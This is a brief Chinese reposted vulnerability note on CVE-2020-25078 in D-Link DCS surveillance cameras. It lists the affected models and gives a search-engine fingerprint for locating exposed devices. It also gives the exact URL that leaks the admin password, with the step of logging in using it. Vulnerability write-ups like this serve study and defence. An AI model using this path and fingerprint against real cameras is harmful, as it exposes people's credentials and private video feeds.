D-Link DCS系列监控账号密码信息泄露漏洞 CVE-2020-25078

本文转载自查看原文 2021-04-28 16:32 548 D-Link

漏洞描述

D-Link DCS系列监控通过访问特定的URL得到账号密码信息，攻击者通过漏洞进入后台可以获取视频监控页面

Note

DCS-2530L DCS-2670L DCS-4603 DCS-4622 DCS-4701E DCS-4703E DCS-4705E DCS-4802E DCS-P703

Note

app="D_Link-DCS-2530L"

访问登录界面

出现漏洞的 Url 为, 其中泄露了账号密码

1 http://xxx.xxx.xxx.xxx/config/getuser?index=0

使用泄露的账号密码登陆系统

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 【逻辑漏洞】任意账号密码重置 es 账号密码 802.1X 账号密码+设备信息双重认证 SSL/TLS协议信息泄露漏洞(CVE-2016-2183) SSL/TLS协议信息泄露漏洞(CVE-2016-2183) Roundcube Webmail信息泄露漏洞(CVE-2015-5383) 解决用户登录、注册传输中账号密码的安全泄露问题迁移mysql账号密码 git修改账号密码 git重置账号密码